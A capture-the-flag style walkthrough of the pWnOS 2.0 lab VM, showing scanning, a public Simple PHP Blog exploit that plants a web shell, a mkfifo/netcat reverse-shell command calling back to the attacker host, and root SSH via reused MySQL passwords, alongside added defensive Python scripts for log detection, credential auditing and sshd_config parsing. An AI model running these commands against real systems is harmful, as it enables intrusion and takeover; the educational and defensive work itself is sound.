pWnOS 2.0 Walkthrough (OSCP Prep)


Introduction

In today’s installment in the OSCP Prep series, we’ll walk through owning pWnOS v2.0 from VulnHub.

pWnOS turned out to be a very simple machine requiring no more than basic enumeration to gain a foothold and move on to root quickly.


Before We Begin

According to the description, the pWnOS VM is set up with a static IP of 10.10.10.100. We’ll have to adjust our virtual network configuration accordingly in order to have connectivity to the machine. The virtual machine’s settings:

  • IP: 10.10.10.100
  • Netmask: 255.255.255.0
  • Gateway: 10.10.10.15

I’ll also add the machine to the /etc/hosts file before beginning scanning.


Scanning

We’ll use RustScan to find any open ports and try to find some version information from Nmap.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> rustscan -a pwnos -- -sV -oA scans/nmap-initial
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.10.100:80
Open 10.10.10.100:22
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -sV -oA scans/nmap-initial" on ip 10.10.10.100
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-15 07:44 CDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 07:44
Scanning 10.10.10.100 [2 ports]
Completed Ping Scan at 07:44, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 07:44
Scanning pwnos (10.10.10.100) [2 ports]
Discovered open port 80/tcp on 10.10.10.100
Discovered open port 22/tcp on 10.10.10.100
Completed Connect Scan at 07:44, 0.00s elapsed (2 total ports)
Initiating Service scan at 07:44
Scanning 2 services on pwnos (10.10.10.100)
Completed Service scan at 07:45, 6.02s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.100.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Nmap scan report for pwnos (10.10.10.100)
Host is up, received syn-ack (0.00035s latency).
Scanned at 2021-08-15 07:44:57 CDT for 6s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.2.17 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.39 seconds

SSH is rarely the initial attack vector without credentials in hand, so we’ll begin with port 80.


Enumerating the Web Server

Launch a browser and head to http://pwnos. We’re greeted with an internal website.

[Screenshot: IsIntS Internal Website]

We can try SQL injection on the “Login” page, and it seems to work; however, we are never redirected anywhere useful.

[Screenshot: Attempting to log in with SQL injection]
[Screenshot: It appears to work, but we are never redirected]

Let’s use gobuster to search for any hidden files or folders.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> gobuster dir -u http://pwnos -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://pwnos
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/15 07:53:06 Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 854]
/blog                 (Status: 301) [Size: 297] [--> http://pwnos/blog/]
/login                (Status: 200) [Size: 1174]
/register             (Status: 200) [Size: 1562]
/info                 (Status: 200) [Size: 49828]
/includes             (Status: 301) [Size: 301] [--> http://pwnos/includes/]
/activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]
/server-status        (Status: 403) [Size: 286]

===============================================================
2021/08/15 07:53:47 Finished
===============================================================

It looks like we have a blog available. Let’s check it out.


Getting a Foothold

The blog identifies itself as Simple PHP Blog 0.4.0, so we have the app version. Are there any public exploits?

(ori0n@apophis) --> [ ~/pwnos ]
  ==> searchsploit simple php blog 0.4.0
------------------------------------------------------------------------ -----------------------
 Exploit Title                                                          |  Path
------------------------------------------------------------------------ -----------------------
Simple PHP Blog 0.4.0 - Multiple Remote s                               | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)           | php/webapps/16883.rb
------------------------------------------------------------------------ -----------------------
Shellcodes: No Results

We want to avoid Metasploit, so let’s download the Perl script and have a look.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> searchsploit -m php/webapps/1191.pl
  Exploit: Simple PHP Blog 0.4.0 - Multiple Remote s
      URL: https://www.exploit-db.com/exploits/1191
     Path: /usr/share/exploitdb/exploits/php/webapps/1191.pl
File Type: Perl script text executable

Copied to: /home/ori0n/pwnos/1191.pl



(ori0n@apophis) --> [ ~/pwnos ]
  ==> mv 1191.pl sploit.pl

(ori0n@apophis) --> [ ~/pwnos ]
  ==> ./sploit.pl

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                   http://www.ftusecurity.com
________________________________________________________________________________

        Program : ./sploit.pl
        Version : v0.1
        Date    : 8/25/2005
        Descript: This perl script demonstrates a few flaws in
                  SimplePHPBlog.

        Comments: THIS PoC IS FOR EDUCATIONAL PURPOSES ONLY...
                  DO NOT RUN THIS AGAINST SYSTEMS TO WHICH YOU DO
                  NOT HAVE PERMISSION TO DO SO!

                  Please see this script comments for solution/fixes
                  to demonstrated vulnerabilities.
                  http://www.simplephpblog.com

        Usage   : ./sploit.pl [-h host] [-e exploit]

                -?      : this menu
                -h      : host
                -e      : exploit
                        (1)     : Upload cmd.php in [site]/images/
                        (2)     : Retreive Password file (hash)
                        (3)     : Set New User Name and Password
                                [NOTE - uppercase switches for exploits]
                                -U      : user name
                                -P      : password
                        (4)     : Delete a System File
                                -F      : Path and System File

        Examples: ./sploit.pl -h 127.0.0.1 -e 2
                  ./sploit.pl -h 127.0.0.1 -e 3 -U l33t -P l33t
                  ./sploit.pl -h 127.0.0.1 -e 4 -F ./index.php
                  ./sploit.pl -h 127.0.0.1 -e 4 -F ../../../etc/passwd
                  ./sploit.pl -h 127.0.0.1 -e 1

It looks like we can upload a PHP shell. Let’s give it a shot.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> ./sploit.pl -h http://pwnos/blog -e 1

________________________________________________________________________________
                  SimplePHPBlog v0.4.0 Exploits
                             by
                     Kenneth F. Belva, CISSP
                    http://www.ftusecurity.com
________________________________________________________________________________
Running cmd.php Upload Exploit....


Retrieved Username and Password Hash: $1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: a
Password is set to: a
Logged into SimplePHPBlog at: http://pwnos/blog/login_cgi.php
Current Username 'a' and Password 'a'...
Created cmd.php on your local machine.
Created reset.php on your local machine.
Created cmd.php on target host: http://pwnos/blog
Created reset.php on target host: http://pwnos/blog
Removed cmd.php from your local machine.
Failed to POST 'http://pwnos/blog/images/reset.php': 500 Internal Server Error at ./sploit.pl line 418.
Removed reset.php from your local machine.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> curl "http://pwnos/blog/images/cmd.php?cmd=id;ls+-la"


<hr/><pre>Command: id;ls -la</pre><hr/><br><pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 16
drwxrwxrwx  2 www-data www-data 4096 Jun 20 17:16 .
drwxrwxrwx 11 root     root     4096 May  9  2011 ..
-rw-r--r--  1 www-data www-data  172 Jun 20 17:16 cmd.php
-rw-r--r--  1 www-data www-data  113 Jun 20 17:16 reset.php
</pre><hr/>.

We have command execution! Now let’s get a better shell. Do we have Netcat available?

(ori0n@apophis) --> [ ~/pwnos ]
  ==> curl "http://pwnos/blog/images/cmd.php?cmd=which+nc"


<hr/><pre>Command: which nc</pre><hr/><br><pre>/bin/nc
</pre><hr/>.

We do. Is it a helpful version or the pesky OpenBSD build?

(ori0n@apophis) --> [ ~/pwnos ]
  ==> curl "http://pwnos/blog/images/cmd.php?cmd=nc+-h+2>%261"


<hr/><pre>Command: nc -h 2>&1</pre><hr/><br><pre>OpenBSD netcat (Debian patchlevel 1.89-3ubuntu5)
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-P proxy_username] [-p source_port]
          [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_protocol]
          [-x proxy_address[:port]] [hostname] [port[s]]
        Command Summary:
                -4              Use IPv4
                -6              Use IPv6
                -D              Enable the debug socket option
                -d              Detach from stdin
                -h              This help text
                -i secs         Delay interval for lines sent, ports scanned
                -k              Keep inbound sockets open for multiple connects
                -l              Listen mode, for inbound connects
                -n              Suppress name/port resolutions
                -P proxyuser    Username for proxy authentication
                -p port         Specify local port for remote connects
                -q secs         quit after EOF on stdin and delay of secs
                -r              Randomize remote ports
                -S              Enable the TCP MD5 signature option
                -s addr         Local source address
                -T ToS          Set IP Type of Service
                -C              Send CRLF as line-ending
                -t              Answer TELNET negotiation
                -U              Use UNIX domain socket
                -u              UDP mode
                -v              Verbose
                -w secs         Timeout for connects and final net reads
                -X proto        Proxy protocol: "4", "5" (SOCKS) or "connect"
                -x addr[:port]  Specify proxy address and port
                -z              Zero-I/O mode [used for scanning]
        Port numbers can be individual or ranges: lo-hi [inclusive]
</pre><hr/>.

It’s the OpenBSD version. No worries. We’ll just use the pipe trick: rm /tmp/f; mkfifo /tmp/f; bash < /tmp/f | nc 10.10.10.10 4444 > /tmp/f 2>&1 (10.10.10.10 being our attacking machine). We’ll set up a listener in another terminal and see if we can catch a shell.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> curl "http://pwnos/blog/images/cmd.php?cmd=rm+/tmp/f;mkfifo+/tmp/f;bash</tmp/f|nc+10.10.10.10+4444>/tmp/f+2>%261"

And it works! We’ve got our shell.
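A defensive aside before moving on. Every step of that foothold left a trace in the Apache access log: a PHP file being executed out of /blog/images/, and query strings full of shell metacharacters. The script below is my own added example, not code from the walkthrough or from the Simple PHP Blog project. It parses combined-format log lines and flags exactly those two patterns; the log lines inside it are constructed to mirror the curl requests above, not real logs from the box, and the user agents and byte counts are made up.

```python
"""Flag web-shell style requests in an Apache access log.

Added example for defenders (not part of the original walkthrough): a small
parser for the combined log format plus two heuristics matching the traffic
seen above, a PHP script executed out of an image/upload directory and a
query parameter carrying shell metacharacters.
"""
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Constructed log lines modelled on the curl requests in the walkthrough;
# these are not real logs from the box.  Three web-shell hits, three benign.
SAMPLE_LOG = """\
10.10.10.10 - - [20/Jun/2021:17:16:02 -0400] "GET /blog/images/cmd.php?cmd=id;ls+-la HTTP/1.1" 200 312 "-" "curl/7.74.0"
10.10.10.10 - - [20/Jun/2021:17:16:40 -0400] "GET /blog/images/cmd.php?cmd=which+nc HTTP/1.1" 200 98 "-" "curl/7.74.0"
10.10.10.10 - - [20/Jun/2021:17:18:11 -0400] "GET /blog/images/cmd.php?cmd=rm+/tmp/f;mkfifo+/tmp/f;bash</tmp/f|nc+10.10.10.10+4444>/tmp/f+2>%261 HTTP/1.1" 200 45 "-" "curl/7.74.0"
10.10.10.10 - - [20/Jun/2021:17:10:05 -0400] "GET /blog/index.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
10.10.10.10 - - [20/Jun/2021:17:10:06 -0400] "GET /blog/images/logo.png HTTP/1.1" 200 2048 "http://pwnos/blog/" "Mozilla/5.0"
10.10.10.10 - - [20/Jun/2021:17:11:00 -0400] "GET /login.php?user=admin&cmd=view HTTP/1.1" 200 1174 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
UPLOAD_DIRS = ("/images/", "/uploads/", "/upload/", "/files/")
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")
# Characters that only make sense if the parameter is being fed to a shell.
SHELL_META = re.compile(r"[;|`<>]|\$\(|&&")


def query_params(query):
    """Split a raw query string into decoded (key, value) pairs.

    Done by hand rather than with parse_qs so that ';' inside a value is kept
    intact on every Python version (older parse_qs treats ';' as a separator).
    """
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            key, _, value = chunk.partition("=")
            pairs.append((unquote_plus(key), unquote_plus(value)))
    return pairs


def classify(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    reasons = []
    if path.endswith(SCRIPT_EXTS) and any(d in path for d in UPLOAD_DIRS):
        reasons.append("server-side script executed from an upload/image directory")
    for key, value in query_params(parts.query):
        if SHELL_META.search(value):
            reasons.append(f"shell metacharacters in parameter {key!r}: {value!r}")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"),
            "status": int(m.group("status")), "target": target, "reasons": reasons}


def scan_log(text):
    """Run classify() over every line and keep the hits."""
    return [hit for hit in (classify(line) for line in text.splitlines()) if hit]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['target']}")
        for reason in hit["reasons"]:
            print("    ", reason)
```

Run it and the three cmd.php requests are reported while the blog page, the image and the harmless cmd=view parameter are not. The first heuristic is the more robust of the two: a directory that exists to hold uploads has no business serving .php at all, so the web server should deny script execution there regardless of what the query string looks like.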


On to root

With a shell in hand, let’s enumerate the web server from the inside. We find a potentially juicy file.

cd /var/www
ls -l
total 36
-rw-r--r--  1 root root 1374 Mar 24  2008 activate.php
drwxrwxrwx 11 root root 4096 May  9  2011 blog
drwxr-xr-x  2 root root 4096 May  7  2011 includes
-rw-r--r--  1 root root  629 May  7  2011 index.php
-rw-r--r--  1 root root   23 Apr  3  2008 info.php
-rw-r--r--  1 root root 3091 May  7  2011 login.php
-rw-r--r--  1 root root  516 Apr  2  2008 mysqli_connect.php
-rw-r--r--  1 root root 4618 Apr  2  2008 register.php
head mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'goodday');

Unfortunately, this password doesn’t seem to actually get us into the database. Moving on.

cd ..
ls -l
total 56
drwxr-xr-x  2 root root  4096 Apr 21  2011 backups
drwxr-xr-x  8 root root  4096 May  7  2011 cache
drwxrwxrwt  2 root root  4096 May  7  2011 crash
-rw-r--r--  1 root root   177 May  7  2011 index.html
drwxr-xr-x 34 root root  4096 May  7  2011 lib
drwxrwsr-x  2 root staff 4096 Apr 21  2011 local
drwxrwxrwt  4 root root    80 Jun 20 16:33 lock
drwxr-xr-x 11 root root  4096 Jun 20 16:32 log
drwxrwsr-x  2 root mail  4096 May  7  2011 mail
-rw-r--r--  1 root root   520 May  7  2011 mysqli_connect.php
drwxr-xr-x  2 root root  4096 May  7  2011 opt
drwxr-xr-x 10 root root   420 Jun 20 16:32 run
drwxr-xr-x  4 root root  4096 May  7  2011 spool
drwxrwxrwt  2 root root  4096 Apr 21  2011 tmp
drwxr-xr-x  2 root root  4096 May  7  2011 uploads
drwxr-xr-x  4 root root  4096 May  9  2011 www
head mysqli_connect.php
<?php # Script 8.2 - mysqli_connect.php

// This file contains the database access information.
// This file also establishes a connection to MySQL
// and selects the database.

// Set the database access information as constants:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');

What’s this? Another MySQL root password? Let’s try this one.

mysql -u root -p
root@ISIntS
show databases;
quit;
Database
information_schema
ch16
mysql
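Two copies of mysqli_connect.php, both connecting as the MySQL root user, both world-readable, and one of them holding the password that turns out to matter. A quick audit script for that class of problem, written by me as an added example rather than taken from the walkthrough or the box, is below. It works over an in-memory list of (path, mode, contents) tuples constructed to resemble the layout found here; the passwords in it are placeholders, not the values from the page, and the paths are illustrative.

```python
"""Audit PHP config files for hard-coded database credentials.

Added example, not part of the walkthrough.  Mirrors what the two
mysqli_connect.php copies above reveal: an application connecting as the
MySQL root user, a credential file readable by every local account, and one
password showing up in more than one place.  The files are an in-memory
construction (path, mode, contents) so the script runs offline.
"""
import re
import stat

# Constructed sample files modelled on the layout found on the box; the
# passwords are placeholders, not the ones from the page.
SAMPLE_FILES = [
    ("/var/www/mysqli_connect.php", 0o644,
     "<?php\nDEFINE ('DB_USER', 'root');\nDEFINE ('DB_PASSWORD', 'placeholder-A');\n"
     "DEFINE ('DB_HOST', 'localhost');\nDEFINE ('DB_NAME', 'ch16');\n"),
    ("/var/mysqli_connect.php", 0o644,
     "<?php\nDEFINE ('DB_USER', 'root');\nDEFINE ('DB_PASSWORD', 'placeholder-B');\n"),
    ("/var/www/includes/config.php", 0o640,
     "<?php\ndefine(\"DB_USER\", \"blog\");\ndefine(\"DB_PASSWORD\", \"placeholder-B\");\n"),
    ("/var/www/index.php", 0o644, "<?php\nrequire('mysqli_connect.php');\n"),
]

# Matches define('DB_X', 'value') in either quote style, any case, any spacing.
DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(?P<name>DB_[A-Z_]+)\1\s*,\s*(['"])(?P<value>[^'"]*)\3\s*\)""",
    re.IGNORECASE,
)


def extract_credentials(source):
    """Return {'DB_USER': ..., 'DB_PASSWORD': ..., ...} found in a PHP source string."""
    return {m.group("name").upper(): m.group("value") for m in DEFINE_RE.finditer(source)}


def audit_files(files):
    """Return (path, finding) tuples for every credential-hygiene problem."""
    findings = []
    seen_passwords = {}
    for path, mode, source in files:
        creds = extract_credentials(source)
        if "DB_PASSWORD" not in creds:
            continue  # not a credential file
        if creds.get("DB_USER", "").lower() == "root":
            findings.append((path, "application connects to MySQL as root"))
        if mode & stat.S_IROTH:
            findings.append((path, "credential file is world-readable (mode %04o)" % (mode & 0o7777)))
        seen_passwords.setdefault(creds["DB_PASSWORD"], []).append(path)
    for paths in seen_passwords.values():
        if len(paths) > 1:
            findings.append((", ".join(paths), "same database password reused across %d files" % len(paths)))
    return findings


if __name__ == "__main__":
    for path, finding in audit_files(SAMPLE_FILES):
        print(f"{path}: {finding}")
```

The fixes are the obvious ones: a dedicated MySQL account with rights on the one database the app needs, the config file owned by root and group-readable by the web server user only (0640), and, above all, no password shared between the database and any system account.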

It’s going to be a pain to try to use MySQL from this netcat shell. We’ll need to upgrade our shell, but first, let’s see if password reuse is an issue on this box. Can root log in through SSH?

grep -i root /etc/ssh/sshd_config
PermitRootLogin yes
# the setting of "PermitRootLogin without-password".

Root can. Let’s try the MySQL password from another terminal.

(ori0n@apophis) --> [ ~/pwnos ]
  ==> ssh root@pwnos
root@pwnos's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Sun Jun 20 17:33:53 EDT 2021

  System load:  0.0               Processes:           80
  Usage of /:   3.0% of 38.64GB   Users logged in:     0
  Memory usage: 26%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May  9 19:29:03 2011
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)

And it works! Winner, winner, chicken dinner!

There is no flag on this system. We’ve got root. We’ve won.
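One thing worth noticing in that last step: grep -i root matched a comment line as well as the real directive, and on a longer sshd_config it would also match values inside Match blocks, which only apply conditionally. The script below is my own added example (not from the walkthrough or the box) that reads the file the way sshd does: comments ignored, the first occurrence of a keyword wins, and anything after the first Match line is left out of the global verdict. The config fragment inside it is constructed to resemble what the grep above showed, and the defaults table assumes an OpenSSH release before 7.0, which is when the default for PermitRootLogin changed from yes to prohibit-password.

```python
"""Determine the effective PermitRootLogin setting from an sshd_config.

Added example, not part of the walkthrough.  A plain `grep -i root` also
returns comment lines (one is visible above) and values inside Match blocks,
so this parses the file the way sshd does: comments are ignored, the first
occurrence of a keyword wins, and keywords after the first Match line only
apply conditionally.
"""
import re

# Constructed sshd_config fragment modelled on the grep output above; the
# quoted comment line is the default Ubuntu one that grep matches.
SAMPLE_SSHD_CONFIG = """\
Port 22
Protocol 2
# Authentication:
LoginGraceTime 120
PermitRootLogin yes
StrictModes yes
PasswordAuthentication yes
# Change to no to disable tunnelled clear text passwords
# the setting of "PermitRootLogin without-password".
UsePAM yes
Match User deploy
    PermitRootLogin no
    PasswordAuthentication no
"""

# Same file with the one change that closes the password-reuse path used above.
HARDENED_SSHD_CONFIG = SAMPLE_SSHD_CONFIG.replace("PermitRootLogin yes", "PermitRootLogin no", 1)

# Defaults for OpenSSH releases before 7.0 (the box runs 5.8); 7.0 changed
# PermitRootLogin's default to prohibit-password.
PRE_7_DEFAULTS = {"permitrootlogin": "yes", "passwordauthentication": "yes"}


def parse_global_settings(text):
    """Return {keyword.lower(): value} for the global section of an sshd_config."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)  # "Key value" or "Key=value"
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break  # everything below the first Match block is conditional
        settings.setdefault(key, value)  # sshd keeps the first value it sees
    return settings


def naive_grep_matches(text):
    """What `grep -i root` would return: every line mentioning root, comments included."""
    return [line for line in text.splitlines() if "root" in line.lower()]


def effective(text, keyword, defaults=PRE_7_DEFAULTS):
    """Effective global value of a keyword, falling back to the version default."""
    key = keyword.lower()
    return parse_global_settings(text).get(key, defaults.get(key, "")).lower()


def audit(text):
    """Findings that explain why a reused root password becomes a remote login."""
    findings = []
    if effective(text, "PermitRootLogin") == "yes":
        findings.append("PermitRootLogin yes: root may authenticate with a password")
    if effective(text, "PasswordAuthentication") == "yes":
        findings.append("PasswordAuthentication yes: password reuse and guessing are possible")
    return findings


if __name__ == "__main__":
    print("grep would show:", naive_grep_matches(SAMPLE_SSHD_CONFIG))
    print("effective PermitRootLogin:", effective(SAMPLE_SSHD_CONFIG, "PermitRootLogin"))
    for finding in audit(SAMPLE_SSHD_CONFIG):
        print(" -", finding)
```

On the sample config grep reports three lines; the parser reports the single directive that counts. Changing that one directive to no (as HARDENED_SSHD_CONFIG does) is enough to stop the password-reuse path used here, and switching PasswordAuthentication off closes the rest.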


Wrapping Up

pWnOS 2.0 was a fun box, but a very quick own. It will be worth coming back to later to look for other methods to get root.
